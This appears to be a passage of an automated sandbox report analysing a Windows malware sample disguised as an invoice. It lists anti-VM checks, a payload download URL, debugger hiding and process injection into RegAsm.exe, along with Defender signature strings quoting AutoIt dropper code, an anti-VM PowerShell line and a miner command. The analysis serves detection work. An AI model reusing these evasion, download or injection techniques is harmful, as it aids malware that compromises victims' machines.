    Source: RegAsm.exe, 0000000A.00000002.7226801339.0000000001370000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32USERPROFILE=https://drive.google.com/uc?export=download&id=1VrytxuZ5ywXyvS_VdIFbNuH61tX5mQ4u
    Source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmpBinary or memory string: Global\VBoxService.exe
    Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmpBinary or memory string: ZU%SystemDrive%\ProgramData\Microsoft\Windows\Hyper-V\Snapshots\*.|*|Microsoft-Hyper-V
    Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmpBinary or memory string: *.bin.|!\qemu-system-armel.exe
    Source: MpSigStub.exe, 00000023.00000003.6269231712.0000028BC3EF4000.00000004.00000001.sdmpBinary or memory string: VMwareVMware
    Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmpBinary or memory string: vboxmrxnp.dll
    Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmpBinary or memory string: *.VSV.|*|Microsoft-Hyper-V
    Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmpBinary or memory string: *.txt.|!\qemu-system-i386.exe
    Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmpBinary or memory string: *|%systemroot%\System32\Vmms.exe|Microsoft-Hyper-V
    Source: FAKTURA I PARAGONY.exe, 00000000.00000002.2630075572.0000000004419000.00000004.00000001.sdmp, RegAsm.exe, 0000000A.00000002.7235089087.0000000002DF9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
    Source: MpSigStub.exe, 00000023.00000003.6283884268.0000028BD64D2000.00000004.00000001.sdmpBinary or memory string: Running on VMWare
    Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmpBinary or memory string: VMware SVGA
    Source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmpBinary or memory string: %vmware
    Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmpBinary or memory string: 3.%ProgramFiles%\Hyper-V\*.|*|Microsoft-Hyper-V
    Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmpBinary or memory string: if(((get-uiculture).name-match"ru|ua|by|cn")-or((get-wmiobject-classwin32_computersystem-propertymodel).model-match"virtualbox|vmware|kvm")){exit;}
    Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmpBinary or memory string: &!*.xml.|!\qemu-system-aarch64.exe
    Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmpBinary or memory string: vmGuestLib.dll
    Source: MpSigStub.exe, 00000023.00000003.6301031977.0000028BD6979000.00000004.00000001.sdmpBinary or memory string: !#RANSMATTR:PeLodDetVmWarepea_isexe&(pea_dt_error_heur_exit_criteria|pea_dt_error_heur_API_limit|pea_dt_error_bb_limit)&pea_detects_vmware
    Source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmpBinary or memory string: Virtual HD
    Source: MpSigStub.exe, 00000023.00000003.6326659590.0000028BD6468000.00000004.00000001.sdmpBinary or memory string: 8mus=mud_muramuyamuebmufbmuhbmu_emuiemuqemuimmujnmuhomubrmufrmu]tmuevmucwmucymu
    Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmpBinary or memory string: vmware-authd.exe
    Source: MpSigStub.exe, 00000023.00000003.6347031294.0000028BD72C3000.00000004.00000001.sdmpBinary or memory string: *.log.|!\Veeam.One.Collector.VMware.Host.exe
    Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmpBinary or memory string: *.rom.|!\qemu-system-aarch64.exe
    Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmpBinary or memory string: *.txt.|!\qemu-system-aarch64.exe
    Source: FAKTURA I PARAGONY.exe, 00000000.00000002.2630075572.0000000004419000.00000004.00000001.sdmp, RegAsm.exe, 0000000A.00000002.7235089087.0000000002DF9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
    Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmpBinary or memory string: *.img.|!\qemu-system-x86_64.exe
    Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmpBinary or memory string: *.BIN.|%SYSTEMPROCESS%|Microsoft-Hyper-V
    Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmpBinary or memory string: VMWare
    Source: MpSigStub.exe, 00000023.00000003.6267325282.0000028BD7515000.00000004.00000001.sdmpBinary or memory string: qemuvirtualvmware\\.\PhysicalDrive0
    Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmpBinary or memory string: *.toc.|!\qemu-system-x86_64.exe
    Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmpBinary or memory string: vmwareservice.exe
    Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmpBinary or memory string: >Host: virtualmachine-update.com
    Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmpBinary or memory string: *.vhds.|*|Microsoft-Hyper-V
    Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmpBinary or memory string: &!*.rom.|!\qemu-system-aarch64.exe
    Source: MpSigStub.exe, 00000023.00000003.6243259523.0000028BC815A000.00000004.00000001.sdmpBinary or memory string: detects_vmware
    Source: MpSigStub.exe, 00000023.00000003.6285070883.0000028BD693A000.00000004.00000001.sdmpBinary or memory string: C:\WINDOWS\SYSTEM32\VMBUSRES.DLL>C:\WINDOWS\SYSTEM32\UNKNOWNDLL.DLL
    Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmpBinary or memory string: *.BIN.|%systemroot%\System32\Vmwp.exe|Microsoft-Hyper-V
    Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmpBinary or memory string: Systeminfo | findstr /i modelExecToStackVirtualBoxVirtual MachineVMware
    Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmpBinary or memory string: vmsrvc
    Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmpBinary or memory string: .)*.BIN.|%SYSTEMPROCESS%|Microsoft-Hyper-V
    Source: MpSigStub.exe, 00000023.00000003.6276951583.0000028BD782D000.00000004.00000001.sdmpBinary or memory string: *VMWARE*
    Source: MpSigStub.exe, 00000023.00000003.6243259523.0000028BC815A000.00000004.00000001.sdmpBinary or memory string: pea_detects_vmware
    Source: MpSigStub.exe, 00000023.00000003.6335925716.0000028BD63AB000.00000004.00000001.sdmpBinary or memory string: aplicativos.netlhe.com/vmnetdhcp/
    Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmpBinary or memory string: % *.rom.|!\qemu-system-x86_64.exe
    Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmpBinary or memory string: % *.toc.|!\qemu-system-x86_64.exe
    Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmpBinary or memory string: *.vhdpmem.|*|Microsoft-Hyper-V
    Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmpBinary or memory string: idKasperkyVPCVMWareSandboxieHiJackThisgetDevicesRC4
    Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmpBinary or memory string: \\vmware-host:Y
    Source: MpSigStub.exe, 00000023.00000003.6274482455.0000028BD75C0000.00000004.00000001.sdmpBinary or memory string: Vmware
    Source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmpBinary or memory string: azurevirtualmachinename_scrubbed
    Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmpBinary or memory string: VBoxTray.exe
    Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmpBinary or memory string: vmtools
    Source: MpSigStub.exe, 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmpBinary or memory string: $ARRAY = [ "vmtoolsd.exe" , "vbox.exe" ]
    Source: MpSigStub.exe, 00000023.00000003.6338116203.0000028BD7305000.00000004.00000001.sdmpBinary or memory string: vmtoolsx7
    Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmpBinary or memory string: *.VHD.|*|Microsoft-Hyper-V
    Source: RegAsm.exe, 0000000A.00000002.7235089087.0000000002DF9000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat
    Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmpBinary or memory string: &!*.bin.|!\qemu-system-aarch64.exe
    Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmpBinary or memory string: &!*.img.|!\qemu-system-aarch64.exe
    Source: MpSigStub.exe, 00000023.00000003.6276951583.0000028BD782D000.00000004.00000001.sdmpBinary or memory string: *QEMU*
    Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmpBinary or memory string: VBoxTray
    Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmpBinary or memory string: *.VHDX.|*|Microsoft-Hyper-V
    Source: MpSigStub.exe, 00000023.00000003.6313892884.0000028BD728C000.00000004.00000001.sdmpBinary or memory string: vmtoolsd.exe
    Source: FAKTURA I PARAGONY.exe, 00000000.00000002.2630075572.0000000004419000.00000004.00000001.sdmp, RegAsm.exe, 0000000A.00000002.7235089087.0000000002DF9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
    Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmpBinary or memory string: *.img.|!\qemu-system-i386.exe
    Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmpBinary or memory string: "Microsoft Hyper-V
    Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmpBinary or memory string: HARDWARE\ACPI\RSDT\VBOX__
    Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmpBinary or memory string: *.xml.|!\qemu-system-i386.exe
    Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmpBinary or memory string: *.xml.|!\qemu-system-armel.exe
    Source: MpSigStub.exe, 00000023.00000003.6269231712.0000028BC3EF4000.00000004.00000001.sdmpBinary or memory string: %s%s\%s.exe%s%sVMwareVMware
    Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmpBinary or memory string: (AntiVirtualPCAntiVirtualBoxAntiVmWare]
    Source: MpSigStub.exe, 00000023.00000003.6275998369.0000028BD761D000.00000004.00000001.sdmpBinary or memory string: Ven_VMware_
    Source: MpSigStub.exe, 00000023.00000003.6335572342.0000028BD6FAA000.00000004.00000001.sdmpBinary or memory string: VmWareMachine
    Source: wevtutil.exe, 00000028.00000002.6525075246.000001B1648BF000.00000004.00000020.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-VID
    Source: MpSigStub.exe, 00000023.00000003.6313892884.0000028BD728C000.00000004.00000001.sdmpBinary or memory string: +system\currentcontrolset\services\vboxguest
    Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmpBinary or memory string: JE%Public%\Documents\Hyper-V\Virtual Hard Disks\*.|*|Microsoft-Hyper-V
    Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmpBinary or memory string: %SystemDrive%\ProgramData\Microsoft\Windows\Hyper-V\Snapshots\*.|*|Microsoft-Hyper-V
    Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmpBinary or memory string: *.txt.|!\qemu-system-armel.exe
    Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
    Source: FAKTURA I PARAGONY.exe, 00000000.00000002.2630075572.0000000004419000.00000004.00000001.sdmp, RegAsm.exe, 0000000A.00000002.7235089087.0000000002DF9000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
    Source: MpSigStub.exe, 00000023.00000003.6347031294.0000028BD72C3000.00000004.00000001.sdmpBinary or memory string: 2-*.log.|!\Veeam.One.Collector.VMware.Host.exe
    Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmpBinary or memory string: D?%ProgramData%\Microsoft\Windows\Hyper-V\*.|*|Microsoft-Hyper-V
    Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmpBinary or memory string: vmtoolsd
    Source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmpBinary or memory string: *.|!%ProgramFiles%\Android\Android Studio\qemu-system-x86_64.exe
    Source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmpBinary or memory string: HSTR:Detects_VirtualPC_VMWare
    Source: MpSigStub.exe, 00000023.00000003.6243259523.0000028BC815A000.00000004.00000001.sdmpBinary or memory string: pea_dynmem_detects_vmware
    Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmpBinary or memory string: *.VMRS.|*|Microsoft-Hyper-V
    Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmpBinary or memory string: VboxService.exe
    Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmpBinary or memory string: *.txt.|!\qemu-system-x86_64.exe
    Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmpBinary or memory string: pUnix file descriptiontargetjob\\vmware-host:Y DomainBigSpace resultiitem]
    Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmpBinary or memory string: 83*|%systemroot%\System32\Vmsp.exe|Microsoft-Hyper-V
    Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmpBinary or memory string: virtual hd
    Source: FAKTURA I PARAGONY.exe, 00000000.00000002.2630075572.0000000004419000.00000004.00000001.sdmp, RegAsm.exe, 0000000A.00000002.7235089087.0000000002DF9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
    Source: FAKTURA I PARAGONY.exe, 00000000.00000002.2628814510.0000000002AE0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32USERPROFILE=windir=\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\syswow64\msvbvm60.dll
    Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmpBinary or memory string: =mQ:#LowFiDetectsVmWareU
    Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmpBinary or memory string: qemu-ga.exe
    Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmpBinary or memory string: ifprocessexists("vboxtray.exe")and$
    Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmpBinary or memory string: vmware svga ii
    Source: MpSigStub.exe, 00000023.00000003.6319059958.0000028BD62F3000.00000004.00000001.sdmpBinary or memory string: ifprocessexists("vmwaretray.exe")thenexit
    Source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmpBinary or memory string: *VMWARE*": IsVirtualPCPresent
    Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmpBinary or memory string: *|%systemroot%\System32\Vmcompute.exe|Microsoft-Hyper-V
    Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmpBinary or memory string: *.vmgs.|*|Microsoft-Hyper-V
    Source: MpSigStub.exe, 00000023.00000003.6339668679.0000028BD61EC000.00000004.00000001.sdmpBinary or memory string: IsVmWare]
    Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmpBinary or memory string: *.rom.|!\qemu-system-armel.exe
    Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmpBinary or memory string: *|%systemroot%\System32\Vmsp.exe|Microsoft-Hyper-V
    Source: RegAsm.exe, 0000000A.00000002.7235089087.0000000002DF9000.00000004.00000001.sdmpBinary or memory string: vmicvss
    Source: FAKTURA I PARAGONY.exe, 00000000.00000002.2630075572.0000000004419000.00000004.00000001.sdmp, RegAsm.exe, 0000000A.00000002.7235089087.0000000002DF9000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
    Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmpBinary or memory string: *.toc.|!\qemu-system-i386.exe
    Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmpBinary or memory string: %Public%\Documents\Hyper-V\Virtual Hard Disks\*.|*|Microsoft-Hyper-V
    Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmpBinary or memory string: http://pubs.vmware.com
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpBinary or memory string: "vmware"$bisvm=trueelseif$smodel="virtualbox"
    Source: MpSigStub.exe, 00000023.00000003.6287012861.0000028BD6A98000.00000004.00000001.sdmpBinary or memory string: SCSIDISKxxvmboxxxharddiskVMware
    Source: MpSigStub.exe, 00000023.00000003.6319059958.0000028BD62F3000.00000004.00000001.sdmpBinary or memory string: +ifprocessexists("vmwaretray.exe")thenexit
    Source: MpSigStub.exe, 00000023.00000003.6335572342.0000028BD6FAA000.00000004.00000001.sdmpBinary or memory string: VirtualMachineDetector
    Source: MpSigStub.exe, 00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmpBinary or memory string: ,ifprocessexists("vboxservice.exe")thenexit
    Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmpBinary or memory string: % *.txt.|!\qemu-system-x86_64.exe
    Source: MpSigStub.exe, 00000023.00000003.6281089235.0000028BD7E5F000.00000004.00000001.sdmpBinary or memory string: ".VmDetector.VirtualMachineDetector
    Source: RegAsm.exe, 0000000A.00000002.7228491604.0000000001518000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW(
    Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmpBinary or memory string: ifstringregexp($oobjectitem.name,"(?i)virtualbox|vmware|virtualpc|sandbox|333333|home-off-d5f0ac|microsof-2c393f|123|vwinxp-maltest")thenreturn1
    Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmpBinary or memory string: 3svmcibex9
    Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmpBinary or memory string: VMware Physical Disk Helper Service
    Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmpBinary or memory string: &!*.toc.|!\qemu-system-aarch64.exe
    Source: MpSigStub.exe, 00000023.00000003.6264485610.0000028BD7D13000.00000004.00000001.sdmpBinary or memory string: __tbt_isVirtualMachine
    Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmpBinary or memory string: VBoxService.exe
    Source: MpSigStub.exe, 00000023.00000003.6318060550.0000028BD7A7F000.00000004.00000001.sdmpBinary or memory string: VMWARETRAY.EXEx
    Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmpBinary or memory string: *.bin.|!\qemu-system-x86_64.exe
    Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmpBinary or memory string: *.rom.|!\qemu-system-i386.exe
    Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmpBinary or memory string: *.rom.|!\qemu-system-x86_64.exe
    Source: MpSigStub.exe, 00000023.00000003.6285070883.0000028BD693A000.00000004.00000001.sdmpBinary or memory string: w!#RANSMATTR:PeLodDynDetVmwarepea_isexe&(pea_dt_error_heur_exit_criteria|pea_dt_error_heur_API_limit|pea_dt_error_bb_limit)&pea_dynmem_detects_vmware
    Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmpBinary or memory string: =8*.BIN.|%systemroot%\System32\Vmwp.exe|Microsoft-Hyper-V
    Source: MpSigStub.exe, 00000023.00000003.6301031977.0000028BD6979000.00000004.00000001.sdmpBinary or memory string: p!#RANSMATTR:PeLodDetVmWarepea_isexe&(pea_dt_error_heur_exit_criteria|pea_dt_error_heur_API_limit|pea_dt_error_bb_limit)&pea_detects_vmware
    Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmpBinary or memory string: "SOFTWARE\VMware, Inc.\VMware Tools
    Source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmpBinary or memory string: KF*.|!%ProgramFiles(x86)%\Android\Android Studio\qemu-system-x86_64.exe
    Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmpBinary or memory string: *.img.|!\qemu-system-armel.exe
    Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe System information queried: ModuleInformation
    Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\
    Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\mpavdlta.vdm
    Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\
    Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\
    Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\1.349.0.0_to_1.351.0.0_mpavbase.vdm._p
    Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe File opened: C:\Windows\SERVIC~1\
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information queried: ProcessInformation

    Anti Debugging:

    Hides threads from debuggers
    Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe Thread information set: HideFromDebugger
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread information set: HideFromDebugger
    Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe Process queried: DebugPort
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process queried: DebugPort
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Debug
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_01046958 KiUserExceptionDispatcher,LdrInitializeThunk,
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: page read and write | page guard

    HIPS / PFW / Operating System Protection Evasion:

    Writes to foreign memory regions
    Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1100000
    Source: unknown Process created: C:\Windows\System32\wevtutil.exe C:\Windows\system32\wevtutil.exe install-manifest C:\Windows\TEMP\03B8EEFF-063F-7FBE-74AE-B9DD32097DDC.man '/resourceFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/messageFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/parameterFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll'
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: pwinmgmts:\\localhost\root\securitycenter
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: <select * from antivirusproduct
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: !#hstr:win32/predator.ra2!mtb
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: = stringreplace ( "
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: " , "n" , "mi" )
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: chrw ( bitxor ( asc (
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: = stringreverse ( "utmbjghxrnjxmtb" )
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: !#alf:trojandropper:win64/miner.rw!mtb
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: xdi_destroykey
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: xdi_shutdown
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: xdi_decryptdata
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: miner.kek.gay:443 --cpu-no-yield --asm=auto --cpu-memory-pool=-1
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: !#tel:trojan:win32/covitse.pi!msr
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: fileinstall ( "c:\users\fud\desktop\11111111\corona.exe" , @appdatadir & "\z11062600\corona.exe" , 1 )
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: shellexecute ( @appdatadir & "\z11062600\corona.exe" , "" , @appdatadir & "\z11062600" )
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: !#hstr:allowlist:injector.autoit.mx
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: #autoit3wrapper_res_field=companyname|genesis venture investment co., ltd.
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: wisest<wisest@vip.qq.com>
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: !#alf:virtool:win32/autinject.g!mtb
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: $xor = bitxor ( $xor , $len + $ii )
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: rtlupd64
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: execute ( "@appdatadir" ) & "\winlogons"
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: \windows\microsoft.net\framework\v2.0.50727\regasm.exe
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: startup ( "winlogons.exe" , "winlogons" , "+r" , "" )
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpBinary or memory string: !#trojan:win32/autoinjec.sa!mtb
